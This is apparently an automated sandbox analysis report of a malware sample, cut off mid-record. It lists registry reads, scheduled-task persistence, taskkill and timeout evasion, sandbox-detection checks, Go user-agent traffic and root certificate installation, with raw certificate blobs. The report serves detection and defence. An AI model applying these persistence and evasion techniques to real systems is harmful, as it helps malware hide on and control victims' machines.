Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc	AD754B4D3FE2C4EE.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002	bcdedit.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\	bcdedit.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc	bcdedit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D	bcdedit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0055	bcdedit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A	bcdedit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A	bcdedit.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags	tapinstall.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\CompatibleIDs	bcdedit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000	AD754B4D3FE2C4EE.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	bcdedit.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\HardwareID	chrome.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0055	bcdedit.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Mfg	bcdedit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	bcdedit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005	bcdedit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C	bcdedit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A	bcdedit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003	bcdedit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006	bcdedit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002	bcdedit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008	bcdedit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008	bcdedit.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags	tapinstall.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003	bcdedit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003	bcdedit.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Capabilities	bcdedit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000	AD754B4D3FE2C4EE.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\CompatibleIDs	tapinstall.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\HardwareID	bcdedit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004	bcdedit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000	tapinstall.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\UpperFilters	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\LowerFilters	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A	bcdedit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051	bcdedit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000	chrome.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000	bcdedit.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\CompatibleIDs	bcdedit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006	bcdedit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A	bcdedit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065	bcdedit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058	bcdedit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016	bcdedit.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002	bcdedit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018	bcdedit.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\	bcdedit.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc	bcdedit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054	bcdedit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\CompatibleIDs	tapinstall.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C	bcdedit.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

C181.tmp.exeSetup.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	C181.tmp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	C181.tmp.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Setup.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

5208 schtasks.exe
5332 schtasks.exe
Delays execution with timeout.exe 2 IoCs
evasion

Processes:

timeout.exetimeout.exe

pid process

6000 timeout.exe
5096 timeout.exe

pid	process
5208	schtasks.exe
5332	schtasks.exe

pid	process
6000	timeout.exe
5096	timeout.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

System Information Discovery

Processes:

multitimer.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	multitimer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	multitimer.exe

GoLang User-Agent 11 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

Processes:

description	flow	ioc
HTTP User-Agent header	9224	Go-http-client/1.1
HTTP User-Agent header	9397	Go-http-client/1.1
HTTP User-Agent header	460	Go-http-client/1.1
HTTP User-Agent header	463	Go-http-client/1.1
HTTP User-Agent header	466	Go-http-client/1.1
HTTP User-Agent header	1129	Go-http-client/1.1
HTTP User-Agent header	9399	Go-http-client/1.1
HTTP User-Agent header	450	Go-http-client/1.1
HTTP User-Agent header	458	Go-http-client/1.1
HTTP User-Agent header	465	Go-http-client/1.1
HTTP User-Agent header	9391	Go-http-client/1.1

Kills process with taskkill 7 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exeTASKKILL.exetaskkill.exe

pid process

3280 taskkill.exe
9956 taskkill.exe
4156 taskkill.exe
4268 taskkill.exe
6064 taskkill.exe
4848 TASKKILL.exe
4824 taskkill.exe

pid	process
3280	taskkill.exe
9956	taskkill.exe
4156	taskkill.exe
4268	taskkill.exe
6064	taskkill.exe
4848	TASKKILL.exe
4824	taskkill.exe

Modifies data under HKEY_USERS 45 IoCs

Processes:

DrvInst.exebcdedit.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	DrvInst.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections	bcdedit.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache	bcdedit.exe

Modifies system certificate store 2 TTPs 17 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

askinstall20.exetapinstall.exevpn.tmpSetup.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	askinstall20.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	tapinstall.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 0f00000001000000200000002dc1a6a6cb0cb42f7e0d2c56f38bc7decbccd143405f669070ce130f9249ba48030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f	tapinstall.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0f00000001000000140000001b4e387db74a69a0470cb08f598beb3b511617530300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be	tapinstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA	vpn.tmp
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e69613